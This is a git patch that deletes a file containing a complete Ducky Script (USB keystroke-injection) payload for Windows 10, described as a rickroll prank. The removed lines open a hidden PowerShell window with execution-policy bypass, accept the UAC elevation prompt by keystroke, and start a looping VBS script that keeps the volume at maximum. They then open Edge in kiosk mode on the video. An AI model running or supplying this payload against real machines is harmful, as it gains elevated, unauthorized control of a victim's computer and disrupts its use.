From e22d6f6a00b90e47a8b42f4f5def34beedadf548 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:17:08 +0000 Subject: [PATCH] Delete Rickroll with Max Volume spam.txt --- Rickroll with Max Volume spam.txt | 51 ------------------------------- 1 file changed, 51 deletions(-) delete mode 100644 Rickroll with Max Volume spam.txt diff --git a/Rickroll with Max Volume spam.txt b/Rickroll with Max Volume spam.txt deleted file mode 100644 index 220d077..0000000 --- a/Rickroll with Max Volume spam.txt +++ /dev/null @@ -1,51 +0,0 @@ -REM Title: Rickroll with Max Volume spam -REM Author: @beigeworm -REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. -REM Target: Windows 10 - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window). -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -CTRL-SHIFT ENTER -DELAY 1500 -ALT y -DELAY 5000 - -REM create the .vbs script to keep the volume maxed. -STRING cmd -ENTER -STRING copy con volup.vbs -ENTER -STRING do -ENTER -STRING Set WshShell = CreateObject("WScript.Shell") -ENTER -STRING WshShell.SendKeys(chr(&hAF)) -ENTER -STRING WScript.Sleep 10 -ENTER -STRING loop -ENTER -CTRL z -ENTER -STRING start volup.vbs -ENTER -DELAY 1000 -STRING exit -ENTER -DELAY 1000 - -REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. -GUI r -DELAY 1000 -STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ -ENTER -DELAY 2000 -STRING f - - -